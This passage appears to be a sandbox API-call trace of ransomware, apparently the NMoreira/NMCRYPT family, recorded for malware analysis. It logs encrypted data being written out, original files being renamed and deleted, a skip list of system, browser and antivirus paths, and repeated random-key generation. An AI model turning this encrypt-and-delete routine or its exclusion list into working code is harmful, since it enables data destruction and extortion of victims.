(in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x9e, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xa0) returned 1 [0146.151] GetLastError () returned 0x0 [0146.151] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xa0, lpOverlapped=0x0) returned 1 [0146.152] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0146.152] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0146.152] CloseHandle (hObject=0x1624) returned 1 [0146.152] CloseHandle (hObject=0x588) returned 1 [0146.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml")) returned 0x20 [0146.152] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml", dwFileAttributes=0x20) returned 0 [0146.153] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml") returned 1 [0146.153] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml")) returned 0 [0146.153] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" [0146.153] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0146.153] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXADC4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxadc4.tmp")) returned 0xadc4 [0146.153] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXADC4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxadc4.tmp"), dwFlags=0x1) returned 0 [0146.154] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXADC4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxadc4.tmp")) returned 1 [0146.154] CryptDestroyKey (hKey=0x9ad138) returned 1 [0146.154] wcslen (_String="OK") returned 0x2 [0146.154] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.154] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.154] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0146.154] CryptDestroyHash (hHash=0x9ad478) returned 1 [0146.154] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0146.154] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*NMCRYPT") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*Recovers your files.html") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*.exe") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*.dll") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*.lnk") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*.bat") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*.ini") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*.msi") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*.scf") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*pagefile.sys*") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*NTUSER.DAT*") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*AppData*") returned 0 [0146.154] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\winrar\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\java\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\windows\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\ESET\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\AVG\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\AVIRA\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*Atheros*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*Realtek*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*bootmgr*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*boot*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*boot*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*CONFIG.SYS*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*IO.SYS*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*MSDOS.SYS*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*NTDETECT.COM*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*ntldr*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*chrome*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*opera*") returned 0 [0146.155] PathMatchSpecW (pszFile="ipscht.xml", pszSpec="*firefox*") returned 0 [0146.155] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml", pszSpec="*") returned 1 [0146.155] strlen (_Str="NMoreira") returned 0x8 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.157] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 